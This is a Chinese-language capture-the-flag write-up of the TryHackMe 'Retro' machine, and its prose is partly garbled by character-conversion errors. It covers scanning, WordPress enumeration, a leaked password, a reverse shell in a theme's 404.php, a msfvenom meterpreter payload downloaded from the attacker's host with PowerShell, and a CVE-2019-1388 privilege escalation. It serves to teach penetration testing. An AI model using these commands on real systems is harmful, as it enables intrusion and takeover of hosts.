免责申明
本文浸透的主机通过非法受权。本文应用的工具和办法仅限学习交换应用,请不要将文中应用的工具和浸透思路用于任何非法用处,对此产生的所有结果,自己不承当任何责任,也不对造成的任何误用或侵害负责。
服务发现
┌──(root💀kali)-[~/tryhackme]
└─# nmap -sV -Pn 10.10.10.216
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 (https://nmap.org) at 2021-11-05 05:03 EDT
Nmap scan report for 10.10.10.216
Host is up (0.30s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
3389/tcp open ms-wbt-server Microsoft Terminal Services
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 32.16 seconds
只有一个 80 服务和数据库
爆破目录
┌──(root💀kali)-[~/dirsearch]
└─# python3 dirsearch.py -e* -t 100 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.216
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_|)
Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100 | Wordlist size: 220545
Output File: /root/dirsearch/reports/10.10.10.216/_21-11-05_05-03-57.txt
Error Log: /root/dirsearch/logs/errors-21-11-05_05-03-57.log
Target: http://10.10.10.216/
[05:03:57] Starting:
[05:04:35] 301 - 150B - /retro -> http://10.10.10.216/retro/ 扫到一个目录,浏览了一下,是一个 wordpress 网站
此时分两步枚举,一持续爆破这个目录,二 wpsscan 枚举 wp 信息
wp 目录爆破
┌──(root💀kali)-[~/dirsearch]
└─# python3 dirsearch.py -e* -t 100 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.216/retro
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_|)
Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100 | Wordlist size: 220545
Output File: /root/dirsearch/reports/10.10.10.216/-retro_21-11-05_05-08-12.txt
Error Log: /root/dirsearch/logs/errors-21-11-05_05-08-12.log
Target: http://10.10.10.216/retro/
[05:08:14] Starting:
[05:08:21] 301 - 161B - /retro/wp-content -> http://10.10.10.216/retro/wp-content/
[05:08:24] 301 - 162B - /retro/wp-includes -> http://10.10.10.216/retro/wp-includes/
[05:09:04] 301 - 159B - /retro/wp-admin -> http://10.10.10.216/retro/wp-admin/
爆出了三个文件夹,且没有文件遍历破绽,看上去没有什么能够利用的信息
wp 信息枚举
确认 wp 版本为:5.2.1
└─# wpscan --url http://10.10.10.216/retro
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.14
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]n
[+] URL: http://10.10.10.216/retro/ [10.10.10.216]
[+] Started: Fri Nov 5 05:09:28 2021
Interesting Finding(s):
[+] Headers
| Interesting Entries:
| - Server: Microsoft-IIS/10.0
| - X-Powered-By: PHP/7.1.29
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://10.10.10.216/retro/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
[+] WordPress readme found: http://10.10.10.216/retro/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://10.10.10.216/retro/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.2.1 identified (Insecure, released on 2019-05-21).
| Found By: Rss Generator (Passive Detection)
| - http://10.10.10.216/retro/index.php/feed/, <generator>https://wordpress.org/?v=5.2.1</generator>
| - http://10.10.10.216/retro/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.2.1</generator>
[+] WordPress theme in use: 90s-retro
| Location: http://10.10.10.216/retro/wp-content/themes/90s-retro/
| Latest Version: 1.4.10 (up to date)
| Last Updated: 2019-04-15T00:00:00.000Z
| Readme: http://10.10.10.216/retro/wp-content/themes/90s-retro/readme.txt
| Style URL: http://10.10.10.216/retro/wp-content/themes/90s-retro/style.css?ver=5.2.1
| Style Name: 90s Retro
| Style URI: https://organicthemes.com/retro-theme/
| Description: Have you ever wished your WordPress blog looked like an old Geocities site from the 90s!? Probably n...
| Author: Organic Themes
| Author URI: https://organicthemes.com
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.4.10 (80% confidence)
| Found By: Style (Passive Detection)
| - http://10.10.10.216/retro/wp-content/themes/90s-retro/style.css?ver=5.2.1, Match: 'Version: 1.4.10'
[+] Enumerating All Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:12 <=============================================================================================================================================================> (137 / 137) 100.00% Time: 00:00:12
[i] No Config Backups Found.
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpscan.com/register
[+] Finished: Fri Nov 5 05:10:05 2021
[+] Requests Done: 170
[+] Cached Requests: 5
[+] Data Sent: 44.025 KB
[+] Data Received: 221.001 KB
[+] Memory used: 210.141 MB
[+] Elapsed time: 00:00:36
kali 搜寻这个版本 wp 的破绽
显示存在 sql 注入
┌──(root💀kali)-[~]
└─# searchsploit WordPress 5.2.1
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
WordPress Core < 5.2.3 - Viewing Unauthenticated/Password/Private Posts | multiple/webapps/47690.md
WordPress Core < 5.3.x - 'xmlrpc.php' Denial of Service | php/dos/47800.py
WordPress Plugin DZS Videogallery < 8.60 - Multiple Vulnerabilities | php/webapps/39553.txt
WordPress Plugin iThemes Security < 7.0.3 - SQL Injection | php/webapps/44943.txt
WordPress Plugin Link Library 5.2.1 - SQL Injection | php/webapps/17887.txt
WordPress Plugin Rest Google Maps < 7.11.18 - SQL Injection | php/webapps/48918.sh
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
看阐明是某个插件有一个注入破绽,但测试这个 wp 不存在这个插件,wpscan 也没有扫出这个插件
在首页咱们看文章的作者名字叫wade,用这个账号尝试登陆 wp 提醒
ERROR: The password you entered for the username wade is incorrect.
这示意 wade 这个账号是的确存在的
咱们用 wpscan 枚举用户名也证实的确存在 wade 和Wade
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:01:07 <============================================================================================================================================================> (200 / 200) 100.00% Time: 00:01:07
[i] User(s) Identified:
[+] wade
| Found By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Wp Json Api (Aggressive Detection)
| - http://10.10.10.216/retro/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] Wade
| Found By: Rss Generator (Passive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
user.txt 的提醒是:
Don’t leave sensitive information out in the open, even if you think you have control over it.
咱们假如作者在公共场合议论了跟本人明码无关的信息,兴许藏在博客文章里
期中一篇文章如同走漏了一些信息
Ready Player One
by Wade
I can’t believe the movie based on my favorite book of all time is going to come out in a few days! Maybe it’s because my name is so similar to the main character, but I honestly feel a deep connection to the main character Wade. I keep mistyping the name of his avatar whenever I log in but I think I’ll eventually get it down. Either way, I’m really excited to see this movie! Ready Player One 就是电源《头等玩家》,
至多咱们当初晓得作者经常会搞混本人和角色的名字,这个电影配角的名字叫:wade
在这条 post 的 comment 上面,作者泄露了本人的明码parzival:
Wade
December 9, 2019
Leaving myself a note here just in case I forget how to spell it: parzival初始 shell
因为零碎开了 3389 服务,用 wade:parzival 远程桌面到靶机拿到 user.txt
xfreerdp /u:wade /v:10.10.10.216
同时咱们能够用下面的凭证登录 wordpress
wordpress 的浸透套路是,一旦失去了管理员的登录账户就去到 Appearance->Theme Edlitor 里编辑源代码
我个别把 webshell 写到 404.php 这个页面,而后在前台拜访一个不存在的页面,触发反弹 shell
咱们把 windows 版本 reverse_shell 写到 404.php,拿到 webshell
┌──(root💀kali)-[~/tryhackme]
└─# nc -nlvp 4242
listening on [any] 4242 ...
connect to [10.13.21.169] from (UNKNOWN) [10.10.10.216] 49792
SOCKET: Shell has connected! PID: 3436
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\inetpub\wwwroot\retro>whoami
iis apppool\retro
咱们用 msfvenom 生成一个稳固的 shell
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.13.21.169 LPORT=4444 -f exe > shell_64.exe
用 webshell 上传到靶机
powershell -c “(new-object System.Net.WebClient).DownloadFile(‘http://10.13.21.169:8000/shel…’,’C:\users\public\Downloads\shell_64.exe’)”
把 nc 和 wget 下载到靶机,以便后续浸透应用, 经测试 C:\users\public\Downloads 是可写的:
在远程桌面,用 wade 的账号点击shell_64.exe,收到 wade 的反弹 shell
msf6 exploit(windows/local/bypassuac_sdclt) > use exploit/multi/handler
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST tun0 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.13.21.169:4444
[*] Sending stage (200262 bytes) to 10.10.10.216
[*] Meterpreter session 3 opened (10.13.21.169:4444 -> 10.10.10.216:50582) at 2021-11-22 05:48:04 -0500
meterpreter > getuid
Server username: RETROWEB\Wade
提权
对于提权的提醒是:
Figure out what the user last was trying to find. Otherwise, put this one on ice and get yourself a better shell, perhaps one dipped in venom.
我结尾认为是在 cmd 或者 powershell 里找历史命令,然而没有播种。起初发现是在浏览器的历史记录里,作者留下了寻找 CVE-2019-1388 的提醒
我在 github 上找到了这个提权脚本。
github 上的解释比较简单,我前面依据这篇具体介绍这个破绽原理的文章提权到了 system
总的来说提权原理就是文章里这段:
当 OID 为超链接时,通过点击此链接会触发 consent.exe 以 SYSTEM 权限关上浏览器拜访此链接,而后此浏览器就会有 SYSTEM 权限。通过保留该浏览页面,会弹出微软的资源管理器,在资源管理器中邮件关上 cmd.exe 程序,就会继承浏览器的 SYSTEM 权限,由此就实现了由普通用户到 NT AUTHORITY\SYSTEM 用户的提权!
在 Administrator 桌面拿到 root.txt
C:\Users\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 7443-948C
Directory of C:\Users\Administrator\Desktop
12/08/2019 08:06 PM <DIR> .
12/08/2019 08:06 PM <DIR> ..
12/08/2019 08:08 PM 32 root.txt.txt
1 File(s) 32 bytes
2 Dir(s) 30,362,959,872 bytes free